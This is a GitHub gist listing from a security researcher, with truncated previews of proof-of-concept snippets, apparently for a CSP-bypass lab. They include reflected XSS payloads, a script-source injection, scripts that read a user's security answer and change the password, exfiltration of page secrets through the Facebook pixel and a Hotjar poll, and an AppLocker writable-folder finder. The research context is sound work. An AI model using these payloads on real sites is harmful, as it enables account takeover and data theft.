Skip to content

Instantly share code, notes, and snippets.

View felmoltor's full-sized avatar
🍊
Is this real life?

Felipe Molina felmoltor

🍊
Is this real life?
View GitHub Profile
@felmoltor
felmoltor / background.js
Created July 3, 2025 10:48
Dummy PoC to use extension to break restrictions from a phishing page
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
console.log("Background script received message:", message);
if (message.action === "inject_poc") {
chrome.tabs.query({}, function(tabs) {
const targetTab = tabs.find(tab => tab.title.includes("Target Page"));
if (targetTab) {
chrome.scripting.executeScript({
target: { tabId: targetTab.id },
files: ["injected.js"]
});
@felmoltor
felmoltor / Search-Writable.ps1
Created November 23, 2023 10:19
Search writable folders and network shares without "accesschk.exe"
# Author: Felipe Molina de la Torre
# Date: Novermber 2023
# Summary: Accessckl-like script, but without using external executable files like "accesschk.exe".
# It shows you the folders and executables where your user have write permissions and why.
# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.
# Class to store permissions
class Permissions {
[string]$GroupName
[string]$SID
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret #1 vuln
// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
function displayError(){
document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
}
displayError();
</script>
// […]
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret 2 vuln
// GET /secret.php?source=js/debug.js
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
const urlParams = new URLSearchParams(window.location.search);
const source = urlParams.get('source');
var s=document.createElement("script");
s.src=source;
document.head.appendChild(s);
</script>
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:42
secret
<?php
if (isset($_GET["msg"])){
$errorMsg = "Error 1005: ".$_GET["msg"];
}
else{
$errorMsg="";
}
?>
'use strict';
export const handler = async (event) => {
const response = {
statusCode: 200,
headers: {
'Content-Type': 'text/html',
},
body: event.queryStringParameters.data,
};
var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');
@felmoltor
felmoltor / PoC-CSP-Bypass-pwn.js
Created August 23, 2023 14:50
Change user password and security answer
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=pd.getElementById('security_question').value;
sa=pd.getElementById('security_answer').value;
email=pd.getElementById('email').value;
username=pd.getElementById('username').value;
@felmoltor
felmoltor / Facebook-exfil-csp.js
Created August 23, 2023 14:45
Facebook CSP Exfiltration
fbq('init', '1179785999289471');
fbq('trackCustom', 'MyEvent-keyfc',{
data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
});
@felmoltor
felmoltor / Hotjar-poll-answer.js
Last active August 23, 2023 14:44
PoC for the CSP bypass Lab
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=(pd.getElementById('security_question')).value;
sa=(pd.getElementById('security_answer')).value;
var data = {"utk":null, "response_content":"{\"version\":4 ,\"answers\":[{\"questionUuid\":\"78942292\"
,\"answer\":\"Something else\",
console.log("Hello from a gist file hosted in felmoltor's github");